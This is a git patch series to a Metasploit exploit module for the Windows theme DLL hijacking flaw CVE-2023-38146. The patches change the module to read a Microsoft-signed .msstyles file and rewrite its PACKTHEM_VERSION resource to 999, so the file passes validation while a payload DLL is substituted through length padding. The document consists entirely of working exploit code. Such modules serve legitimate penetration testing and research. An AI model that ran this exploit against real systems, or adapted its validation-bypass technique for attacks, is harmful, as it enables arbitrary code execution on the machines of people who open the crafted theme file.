From 3ac9c0c38a72246e004736d65eb0224ff94fc17f Mon Sep 17 00:00:00 2001 From: Spencer McIntyre Date: Tue, 19 Dec 2023 17:05:01 -0500 Subject: [PATCH 1/2] Patch in the theme version to the MSStyles file --- .../theme_dll_hijack_cve_2023_38146.rb | 18 +++++++++++------- 1 file changed, 11 insertions(+), 7 deletions(-) diff --git a/modules/exploits/windows/fileformat/theme_dll_hijack_cve_2023_38146.rb b/modules/exploits/windows/fileformat/theme_dll_hijack_cve_2023_38146.rb index 84c930cc29c9..e8bbf99004a4 100644 --- a/modules/exploits/windows/fileformat/theme_dll_hijack_cve_2023_38146.rb +++ b/modules/exploits/windows/fileformat/theme_dll_hijack_cve_2023_38146.rb @@ -21,7 +21,8 @@ def initialize(info = {}) 'DisclosureDate' => '2023-09-13', 'Author' => [ 'gabe_k', # Discovery/PoC - 'bwatters-r7' # msf exploit + 'bwatters-r7', # msf exploit + 'Spencer McIntyre' # msf exploit ], 'References' => [ ['CVE', '2023-38146'], @@ -39,15 +40,15 @@ def initialize(info = {}) 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [ARTIFACTS_ON_DISK, SCREEN_EFFECTS] - } + }, + 'DefaultOptions' => { 'DisablePayloadHandler' => false } ) ) register_options([ + OptPath.new('STYLE_FILE', [ true, 'The Microsoft-signed .msstyles file (e.g. aero.msstyles).' '' ], regex: /.*\w*\.msstyles$/), OptString.new('STYLE_FILE_NAME', [ true, 'The name of the style file to reference.', '' ], regex: /^\w*(\.msstyles)?$/), - OptString.new('THEME_FILE_NAME', [ true, 'The name of the theme file to generate.', 'exploit.theme' ]), - OptPath.new('MS_SIGNED_DLL', [true, 'Signed Microsoft DLL to use for passing validation']), - OptPath.new('MS_VERSION_FILE', [true, 'Signed Microsoft DLL to use for passing validation']) + OptString.new('THEME_FILE_NAME', [ true, 'The name of the theme file to generate.', 'exploit.theme' ]) ]) deregister_options( @@ -69,7 +70,7 @@ def setup end def primer - legit_dll = File.binread(datastore['MS_SIGNED_DLL']) + legit_dll = File.binread(datastore['STYLE_FILE']) payload_dll = generate_payload_dll max_length = [payload_dll.length, legit_dll.length].max # make sure that the lengths are the same by padding the smaller to the length of the larger @@ -99,7 +100,10 @@ def primer def get_file_contents(client:) print_status("Sending file to #{client.peerhost}") - File.binread(datastore['MS_VERSION_FILE']) + pe_raw = File.binread(datastore['STYLE_FILE']) + pe = Rex::PeParsey::Pe.new_from_string(pe_raw) + version_offset = pe.rva_to_file_offset(pe.resources['/PACKTHEM_VERSION/0/0'].rva) + pe_raw[...version_offset] + [999].pack('v') + pe_raw[(version_offset + 2)...] end def make_theme From 6f17088e33c53a9a9db3e2c203ee69ffbe0178a5 Mon Sep 17 00:00:00 2001 From: bwatters Date: Wed, 20 Dec 2023 16:44:49 -0600 Subject: [PATCH 2/2] Fix some linting --- .../windows/fileformat/theme_dll_hijack_cve_2023_38146.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/exploits/windows/fileformat/theme_dll_hijack_cve_2023_38146.rb b/modules/exploits/windows/fileformat/theme_dll_hijack_cve_2023_38146.rb index e8bbf99004a4..cd40530e6e31 100644 --- a/modules/exploits/windows/fileformat/theme_dll_hijack_cve_2023_38146.rb +++ b/modules/exploits/windows/fileformat/theme_dll_hijack_cve_2023_38146.rb @@ -46,7 +46,7 @@ def initialize(info = {}) ) register_options([ - OptPath.new('STYLE_FILE', [ true, 'The Microsoft-signed .msstyles file (e.g. aero.msstyles).' '' ], regex: /.*\w*\.msstyles$/), + OptPath.new('STYLE_FILE', [ true, 'The Microsoft-signed .msstyles file (e.g. aero.msstyles).', '' ], regex: /.*\w*\.msstyles$/), OptString.new('STYLE_FILE_NAME', [ true, 'The name of the style file to reference.', '' ], regex: /^\w*(\.msstyles)?$/), OptString.new('THEME_FILE_NAME', [ true, 'The name of the theme file to generate.', 'exploit.theme' ]) ]) @@ -103,7 +103,7 @@ def get_file_contents(client:) pe_raw = File.binread(datastore['STYLE_FILE']) pe = Rex::PeParsey::Pe.new_from_string(pe_raw) version_offset = pe.rva_to_file_offset(pe.resources['/PACKTHEM_VERSION/0/0'].rva) - pe_raw[...version_offset] + [999].pack('v') + pe_raw[(version_offset + 2)...] + pe_raw[0...version_offset] + [999].pack('v') + pe_raw[(version_offset + 2)...] end def make_theme